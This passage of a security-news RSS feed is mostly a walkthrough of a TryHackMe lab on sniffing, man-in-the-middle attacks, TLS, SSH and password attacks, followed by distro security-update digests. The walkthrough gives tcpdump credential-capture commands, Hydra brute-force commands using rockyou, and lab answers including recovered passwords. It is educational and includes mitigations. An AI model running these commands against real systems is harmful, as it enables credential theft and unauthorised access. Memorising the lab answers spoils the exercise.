of the most reliable ways to harvest credentials and learn how systems actually talk to each other.</blockquote><h3>The tools</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xBxcZK8PVBApVtltOosP4Q.jpeg"><figcaption>Wireshark</figcaption></figure><p>Capturing packets needs a network card and the right privileges (root on Linux, administrator on Windows). Here are the staples:</p><ul><li><strong>tcpdump</strong> — lightweight open-source CLI capture tool, preinstalled on most Linux systems.</li><li><strong>Wireshark</strong> — the GUI standard, with powerful filtering, protocol dissection, and visualization.</li><li><strong>tshark</strong> — Wireshark’s command-line sibling, great for scripting.</li></ul><blockquote>Worth knowing too: <strong>tcpflow</strong> (reassembles TCP streams), <strong>ngrep</strong> (pattern-matching in traffic), and <strong>NetworkMiner</strong> (extracts files from captures).</blockquote><blockquote>Specialized credential-grabbers exist, but tcpdump and Wireshark can do the job with a little effort.</blockquote><h3>Capturing POP3 credentials with tcpdump</h3><p>The classic demo: a user checks email over POP3 (port 110, cleartext).</p><p>With access to the traffic — via a wiretap, a switch’s port mirroring, ARP spoofing, a compromised host, or a successful MITM — you run this command:</p><pre>sudo tcpdump port 110 -A</pre><p>Breaking that down:</p><ul><li>sudo — packet capture needs root privileges.</li><li>port 110 — only keep traffic to or from the POP3 server.</li><li>-A — print packet contents as ASCII, so cleartext is human-readable.</li></ul><p>In the capture, the login arrives across two packets and reads straight out:</p><pre>… USER frank … PASS D2xc9CgD</pre><p>Username frank, password D2xc9CgD, handed over in plain sight.</p><blockquote>Wireshark gets you there even faster: type “pop” in the display filter, and only POP3 traffic remains, credentials included.</blockquote><h4>Handy tcpdump filters</h4><pre>+------------------------------------+-----------------------------------------------------------+<br>| Command                            | Purpose                                                   |<br>+------------------------------------+-----------------------------------------------------------+<br>| sudo tcpdump port 110 -A           | Capture traffic on port 110 (POP3) in readable ASCII      |<br>| sudo tcpdump host 10.20.30.148 -A  | Capture ASCII traffic to/from a specific host IP          |<br>| sudo tcpdump port 80 -A            | Capture HTTP traffic (credentials in POST data)           |<br>| sudo tcpdump port 21 -A            | Capture FTP traffic (cleartext credentials)               |<br>| sudo tcpdump -w capture.pcap       | Save raw network packets to a file for later analysis     |<br>| tcpdump -r capture.pcap -A         | Read and display a saved capture file in ASCII text       |<br>+------------------------------------+-----------------------------------------------------------+</pre><h4>Mitigation</h4><p>Any cleartext protocol is exposed. The only requirement for the attack is a vantage point between the two parties or on the same network segment.</p><p>The core fix is encryption. This means wrapping the protocol in TLS (like HTTP to HTTPS, FTP to FTPS, or POP3 to POP3S) and replacing Telnet with SSH.</p><p>Layered on top of that:</p><ul><li>Network segmentation to limit who can see whose traffic</li><li>Encrypted VLANs or tunnels for sensitive internal traffic</li><li>802.1X port-based authentication so unknown devices can’t connect</li><li>Zero-trust thinking: treat every network as hostile and encrypt everything</li><li>Monitoring for ARP spoofing and other redirection to catch sniffing in progress</li></ul><p>Question: How do you capture only Telnet traffic with tcpdump? Answer: Telnet runs on port 23, so you add “port 23”.</p><p>Question: What is the simplest Wireshark display filter for IMAP? Answer: “imap”.</p><h3>Part 2 — Man-in-the-Middle (MITM) Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*uImWCNSpEizR46XoZzoc7g.png"><figcaption>Man-in-the-Middle Attack</figcaption></figure><p>Sniffing is passive listening. A <strong>MITM attack</strong> is active.</p><p>The attacker slips between two parties (A and B) so that A thinks it’s talking to B, while everything actually flows through the attacker. They can read and completely alter the data.</p><p>The room’s example says it best: A asks to transfer $20, the attacker rewrites the amount mid-flight, and B acts on the tampered message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C0zge6WQ4_HZjbPjnt1i0g.png"><figcaption>Image 1 from the room</figcaption></figure><p>It works whenever the protocol doesn’t verify the authenticity and integrity of each message.</p><h4>Getting into the middle</h4><p>To sit between two parties, an attacker has to redirect traffic through their own machine. Common routes include:</p><ul><li><strong>ARP spoofing</strong> — on a local network, the attacker sends forged ARP messages tying their own MAC address to the gateway’s IP, routing traffic directly to them.</li><li><strong>DNS spoofing </strong>— feeding false DNS answers to send victims to attacker-controlled servers.</li><li><strong>Rogue access points </strong>— fake Wi-Fi setups (like “Airport_WiFi_Free”) that route every connected victim’s traffic through the attacker.</li><li><strong>BGP hijacking </strong>— announcing false routes at the internet’s routing layer to reroute traffic for whole organizations or regions.</li></ul><h4>The tooling</h4><ul><li><strong>Bettercap </strong>— the modern, actively maintained successor to Ettercap. Handles ARP/DNS spoofing, HTTP/HTTPS proxying, and is modular.</li><li><strong>Ettercap</strong> — the classic LAN MITM tool. It still works, but Bettercap is generally preferred today.</li><li><strong>mitmproxy </strong>— an interactive HTTPS proxy used for inspecting and modifying web traffic on the fly.</li><li><strong>Responder </strong>—<strong> </strong>Windows-focused<strong>.</strong> Abuses fallback name-resolution protocols (LLMNR, NBT-NS) that kick in when DNS fails, answering with its own IP to capture authentication hashes. A staple of internal Active Directory pentests.</li></ul><h4>MITM against encrypted traffic</h4><p>Encryption raises the bar, but it isn’t a magic shield:</p><ul><li><strong>SSL stripping</strong> — quietly downgrade the victim’s connection to plain HTTP while the attacker keeps an HTTPS link to the real server. This is easy to miss if the user never typed <em>“https://”</em> or didn’t check for the padlock icon.</li><li><strong>Fake certificates</strong> — present your own certificate and run two separate encrypted legs. This works if the victim blindly clicks through the browser warning or if a Certificate Authority is compromised.</li><li><strong>Compromised or rogue CAs </strong>— the most serious case. If an attacker controls a trusted CA, they can mint valid-looking certificates for absolutely any domain.</li></ul><h4>Modern defenses</h4><p>A decade of security hardening makes MITM much harder now:</p><ul><li><strong>HTTPS by default</strong> (browsers flag plain HTTP as “Not Secure”)</li><li><strong>HSTS</strong> (forces HTTPS and blocks stripping attacks)</li><li><strong>Certificate Transparency</strong> (public, auditable logs of all issued certificates)</li><li><strong>Certificate pinning</strong> (apps accept only specific, hardcoded keys)</li><li><strong>DANE</strong> (publishing certificate info in DNSSEC-signed DNS)</li></ul><p>MITM still succeeds when users ignore certificate warnings, apps validate keys poorly, the target speaks cleartext, or legacy gear lacks modern features.</p><p>The fundamental fix remains the same: cryptography. You need authentication plus encryption/signing, which is exactly what properly implemented TLS provides.</p><p><strong>Question 1:</strong> How many interfaces does Ettercap offer?</p><pre>Answer: 3</pre><p><strong>Question 2:</strong> How many ways can you invoke Bettercap?</p><pre>Answer: 3</pre><h3>Part 3 — TLS: The Fix for Both Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*3Qn-dR4Ps9kwTxZGqRBBHw.jpeg"></figure><p>Both sniffing and MITM share one cure: TLS (Transport Layer Security). This part of the room is the solution chapter.</p><h4>A quick history</h4><p>SSL appeared in 1994 via Netscape, with SSL 3.0 dropping in 1996 as the web grew into shopping and payments. TLS succeeded it in 1999.</p><p>Where things stand now:</p><ul><li>SSL 2.0 and 3.0 are deprecated and highly insecure. Never use them.</li><li>TLS 1.0 and 1.1 were officially deprecated in 2021 and dropped by major browsers.</li><li>TLS 1.2 (from 2008) is still widely used and secure when configured with modern ciphers.</li><li>TLS 1.3 (from 2018) is the current standard. It features fewer algorithms, a faster handshake, and forward secrecy by default.</li></ul><p>People still say “SSL certificate” out of habit, but in practice, everything modern uses TLS.</p><h4>Where TLS sits</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q9wEkyyAKPn28lVN9bDX2Q.png"><figcaption>Image 2 from the room</figcaption></figure><p>Cleartext application-layer protocols send data entirely in the open.</p><p>TLS adds encryption just below the application protocol, wrapping its data before it hits the network card. On the OSI model, it lives right between the transport and application layers.</p><h4>Upgrading protocols with TLS</h4><ul><li>HTTP (Port 80) upgrades to HTTPS (Port 443)</li><li>FTP (Port 21) upgrades to FTPS (Port 990)</li><li>SMTP (Port 25) upgrades to SMTPS (Port 465)</li><li>POP3 (Port 110) upgrades to POP3S (Port 995)</li><li>IMAP (Port 143) upgrades to IMAPS (Port 993)</li></ul><p>It’s not just web and mail. DNS can be wrapped too via DoT (DNS over TLS) on port 853, or DoH (DNS over HTTPS) on port 443. Both stop eavesdroppers from seeing which sites you look up.</p><h4>Implicit TLS vs STARTTLS</h4><ul><li>Implicit TLS uses a dedicated port that is fully encrypted from the very first byte (like 443 or 993).</li><li>STARTTLS connects in cleartext on the normal port, then issues a “STARTTLS” command to upgrade the connection in place. This is common for email setup.</li></ul><blockquote>Both offer encryption, but implicit TLS is highly preferred.</blockquote><p>A MITM attacker can easily strip the STARTTLS command during negotiation and force the session to stay in cleartext if the client isn’t configured to require it.</p><h4>How HTTPS works</h4><p>Plain HTTP takes two steps: open a TCP connection, then send requests. HTTPS inserts a step in between:</p><ol><li>Establish a standard TCP connection.</li><li>Establish a TLS connection (the handshake).</li><li>Send the HTTP requests, which are now fully encrypted.</li></ol><p>A simplified TLS 1.2 handshake goes like this:</p><blockquote><strong>ClientHello</strong> (client offers its TLS versions and cipher suites) <strong>→</strong> <strong>ServerHello</strong> (server picks the parameters and sends its certificate) <strong>→ Key Exchange</strong> (both derive a shared secret)<strong> →</strong> <strong>Finished</strong> (both confirm and switch to encrypted communication):</blockquote><pre>ClientHello → ServerHello → Key Exchange → Finished</pre><h4>Certificates and trust</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*-10wNzrM0tEpRINoAqc5mQ.png"><figcaption>Certificate Authority (CA)</figcaption></figure><p>HTTPS leans on certificates signed by trusted Certificate Authorities (CAs). Your browser expects a valid certificate from a trusted CA, which proves you’re talking to the real server and blocks easy MITM attempts.</p><p>A certificate shows who it was issued to, who issued it, and its validity period. An expired certificate should never be trusted.</p><p>The modern ecosystem made this nearly universal thanks to automated platforms like <a href="https://letsencrypt.org/"><em>Let’s Encrypt</em></a>, which pushed global HTTPS traffic past 95%.</p><p><strong>Question:</strong> What is the three-letter acronym for the DNS protocol that uses TLS?</p><pre>Answer: DoT (DNS over TLS)</pre><h3>Part 4 — SSH: Secure Remote Administration</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*EidIDqyfQGBr2l3Y-KLmog.png"><figcaption>SSH</figcaption></figure><p>SSH (Secure Shell) is the secure replacement for Telnet. It is the universal way to administer servers, network gear, and cloud infrastructure.</p><p>The “S” means you can confirm the server’s identity, your messages are encrypted for the intended recipient only, and any data tampering is instantly detectable.</p><blockquote>It handles confidentiality and integrity seamlessly over port 22.</blockquote><h4>Authentication methods</h4><ul><li><strong>Password </strong>— The simplest method. The password rides the encrypted channel, but weak choices can still fall to brute-force attacks.</li><li><strong>Public key (recommended) </strong>— A private key stays on your machine, while the public key goes on the server. The server challenges you to prove you hold the private key without ever transmitting it.</li><li><strong>Certificate-based </strong>— An SSH CA signs user and host keys. This scales incredibly well because you don’t have to manually distribute public keys to every single server.</li><li><strong>MFA </strong>— Combines a traditional key or password with a one-time code for high-security environments.</li></ul><h4>Connecting</h4><ul><li>To connect, you run:</li></ul><pre>ssh mark@MACHINE_IP</pre><p>Enter the password or let your key authenticate, and you are on the remote terminal. Every single command you send runs over an encrypted channel.</p><p><strong>Question:</strong> Connect as mark (password XBtc49AB) and find the kernel release with uname -r.</p><pre>Commands: ssh mark@MACHINE_IP uname -r</pre><pre>Answer: 5.15.0–119-generic</pre><h4>Host key verification</h4><p>On your very first connection, SSH shows the server’s key fingerprint and asks if you want to continue.</p><p>Ideally, you verify this fingerprint through an admin or config management before typing “yes”. It is then saved in your local known_hosts file.</p><p>If that key ever changes unexpectedly in the future, SSH throws a massive warning, a major indicator of a potential MITM attack or a reinstalled server.</p><h4>Generating keys</h4><ul><li>To create a new key pair, run:</li></ul><pre>ssh-keygen -t ed25519 -C "your_email@example.com"</pre><p>The private key stays strictly on your machine and should be passphrase-protected. The public key (.pub) is safe to share. You can push it to a remote server easily using:</p><pre>ssh-copy-id mark@MACHINE_IP</pre><h4>Useful options</h4><pre>+--------------------------------------------+------------------------------------------------------------+<br>| Command                                    | Purpose                                                    |<br>+--------------------------------------------+------------------------------------------------------------+<br>| ssh -p 2222 mark@MACHINE_IP                | Connect to a remote server running on a non-standard port   |<br>| ssh -i ~/.ssh/custom_key mark@MACHINE_IP   | Specify a specific private key file to use for login       |<br>| ssh -J bastion.example.com mark@internal   | Jump through a secure bastion host to reach an internal IP |<br>| ssh -L 8080:localhost:80 mark@MACHINE_IP   | Set up a local port forward to tunnel traffic through SSH  |<br>| ssh -D 9050 mark@MACHINE_IP                | Create a dynamic SOCKS proxy forward for traffic routing   |<br>| ssh mark@MACHINE_IP "cat /etc/passwd"      | Run a single, one-off command without opening a full shell |<br>+--------------------------------------------+------------------------------------------------------------+</pre><h4>Secure file transfer</h4><ul><li><strong>SFTP</strong> — Interactive, FTP-like file management running completely over SSH. This is the recommended choice today.</li><li><strong>SCP </strong>— Simple file copies over SSH. This is now deprecated by OpenSSH in favor of SFTP, though it still works on most systems.</li><li><strong>rsync over SSH </strong>— The best option for large or repeated transfers because it only copies the specific parts of files that changed.</li></ul><p>To copy files via SCP:</p><pre>scp mark@MACHINE_IP:/home/mark/archive.tar.gz ~/ (remote to local)</pre><pre>scp backup.tar.bz2 mark@MACHINE_IP:/home/mark/ (local to remote)</pre><p><strong>Quick clarifier:</strong></p><blockquote>SFTP runs over SSH (port 22).</blockquote><blockquote>FTPS is FTP-over-TLS (port 990).</blockquote><p>They are entirely different protocols despite having similar names.</p><p><strong>Question:</strong> Download book.txt from the remote system; what download size did scp display in KB?</p><pre>Command: scp mark@MACHINE_IP:/home/mark/book.txt ~/</pre><pre>Answer: 415</pre><h4>Hardening SSH</h4><p>To protect a server, you can modify its config file <em>(/etc/ssh/sshd_config)</em>:</p><ul><li>Set PasswordAuthentication to “no” once public keys are established.</li><li>Set PermitRootLogin to “no” to force users to log in with regular accounts first.</li><li>Use AllowUsers or AllowGroups to create an explicit access whitelist.</li><li>Change the default port to reduce automated log noise.</li><li>Deploy fail2ban to automatically block IPs with repeated failed login attempts.</li></ul><h3>Part 5 — Password Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6_lWVwmNlB93-2JkYWo8Og.png"></figure><p>Even with a network fully encrypted, authentication remains a primary target. Authentication is simply the act of proving your identity, like entering a password to access a service.</p><p>The three factors:</p><ul><li><strong>Something you know </strong>— a password or PIN</li><li><strong>Something you have </strong>— a phone, hardware security key, or smart card</li><li><strong>Something you are </strong>— a fingerprint or facial scan</li></ul><p>This section focuses entirely on attacking “something you know.”</p><h4>Why weak passwords persist</h4><p>Massive historic breaches show that old habits die hard.</p><p>The most common passwords found in modern breaches still include variations like 123456, password, qwerty, Password1, and seasonal choices like Summer2024.</p><p>Because people constantly reuse passwords across multiple sites, a single leak frequently gives attackers access to entirely unrelated corporate or personal accounts.</p><h4>Types of attacks</h4><ul><li><strong>Guessing </strong>— using personal info like a target’s pet, birth year, or favorite sports team harvested from social media.</li><li><strong>Dictionary</strong>— automatically trying lists of real words and common variations.</li><li><strong>Brute force </strong>— systematically trying every possible characters combination. This is exhaustive, which is why password length matters so much.</li><li><strong>Credential stuffing</strong> — taking leaked username/password pairs from old breaches and automatically testing them against other web services.</li><li><strong>Password spraying </strong>— testing one or two incredibly common passwords against a massive list of user accounts to dodge lockout policies.</li><li><strong>Hybrid</strong> — combining dictionary words with systematic patterns, like capitalizing the first letter and adding a year to the end.</li></ul><h4>Wordlists</h4><ul><li>The classic go-to wordlist is RockYou, located on the TryHackMe AttackBox at:</li></ul><pre>/usr/share/wordlists/rockyou.txt</pre><blockquote>Beyond that, security professionals use collections like SecLists, CrackStation lists, or custom-generated lists tailored specifically to the target’s language, region, or industry habits.</blockquote><h4>THC Hydra</h4><p>Hydra is a fast network login cracker that throws wordlists at live services like FTP, POP3, IMAP, SSH, and HTTP.</p><p>The basic syntax looks like this:</p><pre>hydra -l username -P wordlist.txt server service</pre><ul><li>-l specifies a single username (-L for a text file of names)</li><li>-P specifies a password wordlist (-p for a single password)</li><li>server is the target IP or hostname</li><li>service is the protocol you are targeting</li></ul><p>Examples:</p><pre>hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp<br>hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh<br>hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><p>Handy options include -s to target a non-default port, -vV for detailed verbosity, -t to adjust parallel attack threads, and -f to immediately stop execution when the first valid password is found.</p><h4>Other tools</h4><p>Alternative online crackers include <strong>Medusa</strong> and <strong>Ncrack</strong>.</p><p>For Windows and Active Directory environments, tools like <strong>NetExec</strong> excel at spraying credentials over SMB and LDAP.</p><p>If you manage to dump password hashes from a database, offline tools like <strong>Hashcat</strong> or <strong>John the Ripper </strong>are used because they can guess millions of combinations per second without worrying about network lag or lockouts.</p><h4>Mitigation</h4><p>Defending against password attacks requires a modern approach to identity management:</p><ul><li>Enforce <strong>length-first password policies</strong> based on NIST guidelines. Favor overall length over complex character rotation, and check new passwords against lists of known compromised credentials.</li><li>Implement <strong>strict account lockout</strong> or <strong>throttling mechanisms</strong> to kill automated automated guessing, while remaining aware of password spraying patterns.</li><li>Use <strong>CAPTCHAs</strong> to prevent basic bot execution on login forms.</li><li>Deploy <strong>Multi-Factor Authentication (MFA)</strong> across all external endpoints.</li><li>Transition toward <strong>passwordless ecosystems</strong>, utilizing passkeys (FIDO2/WebAuthn), hardware keys, or verified magic links.</li></ul><p><strong>Question: </strong>One email account is lazie; what password accesses the IMAP service?</p><pre>Command: hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><pre>Answer: butterfly</pre><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*35eDunQG0NLCy_K2XVOvtA.jpeg"></figure><p>The fundamental rule of network security is simple:</p><blockquote>Cleartext protocols are inherently insecure.</blockquote><p>Anything sent without encryption can be effortlessly intercepted by sniffing or manipulated via a Man-in-the-Middle attack.</p><p>The security path forward is uniform across all services:</p><ul><li>Use HTTPS instead of HTTP</li><li>Use SSH instead of Telnet</li><li>Use SFTP or FTPS instead of basic FTP</li><li>Use IMAPS, POP3S, and SMTPS instead of their legacy cleartext variants</li></ul><p>Even when a connection is perfectly encrypted, weak passwords remain a glaring vulnerability.</p><p>Secure the protocol with robust encryption, then secure the account with long passwords, rate limiting, and multi-factor authentication.</p><h4>Quick Port Reference Guide</h4><pre>+-------------------+------+----------------+<br>| Protocol          | Port | Security       |<br>+-------------------+------+----------------+<br>| FTP               | 21   | Cleartext      |<br>| FTPS              | 990  | TLS (implicit) |<br>| HTTP              | 80   | Cleartext      |<br>| HTTPS             | 443  | TLS (implicit) |<br>| IMAP              | 143  | Cleartext      |<br>| IMAPS             | 993  | TLS (implicit) |<br>| POP3              | 110  | Cleartext      |<br>| POP3S             | 995  | TLS (implicit) |<br>| SMTP              | 25   | Cleartext      |<br>| SMTP submission   | 587  | STARTTLS       |<br>| SMTPS             | 465  | TLS (implicit) |<br>| SSH / SFTP        | 22   | Encrypted (SSH)|<br>| Telnet            | 23   | Cleartext      |<br>+-------------------+------+----------------+</pre><p><em>Room: Protocols and Servers 2 — TryHackMe (</em><a href="https://tryhackme.com/room/protocolsandservers2"><em>https://tryhackme.com/room/protocolsandservers2</em></a><em>). This writeup is for educational purposes; only test systems you’re authorized to. Have fun!</em></p><p><em>This article was written by Pop123 as a walkthrough for the TryHackMe lab. I am as always open to further discussing the topic.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=42c2d01f5c6c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/protocols-and-servers-2-tryhackme-writeup-42c2d01f5c6c">Protocols and Servers 2 TryHackMe Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (git-lfs, perl-Archive-Tar, perl-IO-Compress, python3.12-urllib3, and runc), Debian (sogo), Fedora (perl-DBI and perl-Socket), Oracle (firefox, freerdp, git-lfs, libsoup, libxml2, mod_md, mysql, perl-Archive-Tar, perl-IO-Compress, python, python3.12-...]]></description>
<link>https://tsecurity.de/de/3635696/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635696/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 30 Jun 2026 15:11:05 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (git-lfs, perl-Archive-Tar, perl-IO-Compress, python3.12-urllib3, and runc), <b>Debian</b> (sogo), <b>Fedora</b> (perl-DBI and perl-Socket), <b>Oracle</b> (firefox, freerdp, git-lfs, libsoup, libxml2, mod_md, mysql, perl-Archive-Tar, perl-IO-Compress, python, python3.12-urllib3, rsync, thunderbird, tomcat, xorg-x11-server, and xorg-x11-server-Xwayland), <b>SUSE</b> (389-ds, 7zip, alsa, amazon-ecs-init, amazon-ssm-agent, ansible-core, apache2, atril, avahi, bind, bitcoin, capnproto, chromedriver, chromium, cosign, distribution, dnsdist, docker, dovecot24, dracut, firefox, firewalld, freeipmi, freerdp, giflib, gimp, gleam, glib-networking, glibc, glycin-loaders, golang-github-prometheus-alertmanager, google-cloud-sap-agent, google-guest-agent, graphite2, gsasl, hamlib, helm, himmelblau, ignition, imagemagick, istioctl, jackson-databind, jq, jupyter-jupyterlab-templates, keylime, krb5, ldns, libaom, libcaca, libgcrypt, libheif, libinput, libjxl, libnfs, libslirp-devel, libsolv, libzypp, zypper, libssh2_org, libvncserver, libyang, lldpd, logback, loupe, mbedtls, mbedtls-2, mcphost, mozjs128, mutt, nano, nginx, ocaml, ofono, openCryptoki, opencryptoki, opensc, openssh, openssl-3, papers, perl-compress-raw-zlib, perl-config-inifiles, perl-cpanel-json-xs, perl-crypt-passwdmd5, perl-DBI, perl-dbi, perl-html-parser, perl-http-daemon, perl-libwww-perl, perl-protocol-http2, postfix, postgresql14, postgresql15, postgresql16, python-aiohttp, python-biopython, python-click, python-ecdsa, python-idna, python-markdown, python-joblib,, python-paramiko, python-pdm, python-pip, python-py7zr, python-pydata-sphinx-theme, python-pyjwt, python-python-multipart, python-starlette, python-tornado6, python311-jupyter-ydoc, rpcbind, sed, sg3_utils, sqlite3, strongswan, tar, thunderbird, tomcat, tomcat10, tomcat11, trivy, unbound, util-linux, warewulf4, webkit2gtk3, xar, xwayland, yt-dlp, and zypper, libzypp, libsolv), and <b>Ubuntu</b> (libheif, nss, qemu, roundcube, and sqlite3).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (containernetworking-plugins, golang, kernel, libpng, libpng15, nginx, opencryptoki, perl-IO-Compress, thunderbird, and tigervnc), Debian (chromium, gdcm, incus, libhtml-parser-perl, lxd, openvpn, tor, and xorg-server), Fedora (chromium, docker-build...]]></description>
<link>https://tsecurity.de/de/3633025/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633025/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 29 Jun 2026 15:24:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (containernetworking-plugins, golang, kernel, libpng, libpng15, nginx, opencryptoki, perl-IO-Compress, thunderbird, and tigervnc), <b>Debian</b> (chromium, gdcm, incus, libhtml-parser-perl, lxd, openvpn, tor, and xorg-server), <b>Fedora</b> (chromium, docker-buildkit, docker-buildx, dotnet10.0, dotnet8.0, dotnet9.0, krita, ldns, libssh2, liferea, lighttpd, mariadb10.11, mariadb11.8, moby-engine, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, openbao, pacemaker, pgadmin4, podman-tui, prometheus-podman-exporter, python-jupyter-server, python-mistune, python-postorius, python-pydantic-settings, python3-docs, python3.14, thunderbird, tigervnc, tinyproxy, and util-linux), <b>Mageia</b> (krb5), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, dracut, fence-agents, firefox, frr, frr10, glib2, glibc, gnutls, golang, kernel, libpng, libpng15, libreoffice, libxml2, libxslt, mod_http2, mysql:8.4, nginx:1.26, openssl, php:8.3, podman, postgresql-jdbc, python3.14, redis, rsync, thunderbird, tomcat, valkey, and vim), <b>Red Hat</b> (osbuild-composer), and <b>SUSE</b> (agama-web-ui, asn1c, assimp, assimp-devel, aws-iam-authenticator, calibre, clamav, corepack24, dovecot22, exiv2, frr, giflib, glances-common, google-osconfig-agent, GraphicsMagick, gvim, haproxy, hydra, ImageMagick, jupyter-nbclassic, kernel, libsoup, libsoup2, libssh2-1, nano, NetworkManager-applet-openvpn, nodejs22, openbabel, opensc, openssl-3, pacemaker, python, python-base, python-doc, python311-pdm, python311-py7zr, python311-pypdf, python36, tar, trivy, util-linux, xen, and xtrabackup).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3627848/unix-server/security-mehrere-probleme-in-rsync-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627848/unix-server/security-mehrere-probleme-in-rsync-fedora/</guid>
<pubDate>Fri, 26 Jun 2026 17:46:23 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (buildah, coreutils, evince, libpng, libreoffice, libtasn1, libxml2, libxslt, nginx, nginx:1.24, nginx:1.26, postgresql:12, python-urllib3, python3.12-urllib3, python3.14, python3.14-urllib3, skopeo, tigervnc, tomcat, and vim), Debian (chromium, dnsd...]]></description>
<link>https://tsecurity.de/de/3627538/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627538/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 26 Jun 2026 15:23:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (buildah, coreutils, evince, libpng, libreoffice, libtasn1, libxml2, libxslt, nginx, nginx:1.24, nginx:1.26, postgresql:12, python-urllib3, python3.12-urllib3, python3.14, python3.14-urllib3, skopeo, tigervnc, tomcat, and vim), <b>Debian</b> (chromium, dnsdist, giflib, libdbi-perl, libssh2, libtext-csv-xs-perl, pdns, pdns-recursor, python-urllib3, and sogo), <b>Fedora</b> (goose, httpd, librabbitmq, perl-Compress-Raw-Bzip2, perl-DBI, perl-IO-Compress, perl-Socket, python-django-allauth, rsync, and strongswan), <b>Oracle</b> (389-ds-base, buildah, containernetworking-plugins, coreutils, evince, fence-agents, giflib, git-lfs, hplip, krb5, libcap, libexif, libtasn1, memcached, opencryptoki, podman, postfix, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python-urllib3, python3.12-urllib3, python3.14-urllib3, python3.9, runc, skopeo, tigervnc, vim, webkit2gtk3, xorg-x11-server, and xorg-x11-server-Xwayland), <b>SUSE</b> (apache-commons-configuration2, apache-commons-text, apache2, containerd, kernel, libnilfs3, libopenbabel8, libtar, libzypp, lrzip, nodejs24, ofono, perl-Net-Dropbox-API, podman, python-pip, python-PyJWT, python311-aiohttp, python311-nltk, python311-python-multipart, python312, and python315), and <b>Ubuntu</b> (amd64-microcode, containerd, containerd-app, containerd-stable, cpp-httplib, imagemagick, mina2, node-pbkdf2, NSD, and xrdp).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-29154: Rsync client-side arbitrary file write vulnerability]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3621787/it-security-nachrichten/cve-2022-29154-rsync-client-side-arbitrary-file-write-vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621787/it-security-nachrichten/cve-2022-29154-rsync-client-side-arbitrary-file-write-vulnerability/</guid>
<pubDate>Wed, 24 Jun 2026 16:54:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://api.follow.it/track-rss-story-loaded/v1/s_z2HepJ1-AkGEEx3W1Wi3n9ye8UNv30" border="0" width="1" height="1" alt="CVE-2022-29154: Rsync client-side arbitrary file write vulnerability" title="CVE-2022-29154: Rsync client-side arbitrary file write vulnerability">]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Backup Bible: Timeshift, rsync, Borg, Restic (2026)]]></title>
<description><![CDATA[Complete guide to Linux backup tools in 2026. Covers Timeshift system snapshots, rsync incremental backups, Borg encrypted deduplication, and Restic cross-platform backups. Includes verified commands for Ubuntu, Fedora, and Arch Linux, plus a tested 3-2-1 backup strategy with systemd automation.]]></description>
<link>https://tsecurity.de/de/3617147/linux-tipps/linux-backup-bible-timeshift-rsync-borg-restic-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617147/linux-tipps/linux-backup-bible-timeshift-rsync-borg-restic-2026/</guid>
<pubDate>Tue, 23 Jun 2026 05:53:58 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
